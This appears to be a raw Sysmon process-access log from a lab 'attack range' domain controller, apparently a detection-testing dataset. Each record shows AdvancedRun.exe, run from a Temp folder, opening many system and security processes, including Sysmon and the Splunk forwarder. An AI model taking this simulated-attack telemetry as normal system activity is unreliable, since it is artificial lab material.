Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.574{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.572{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.569{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.569{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.568{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.568{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.568{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.565{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.565{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
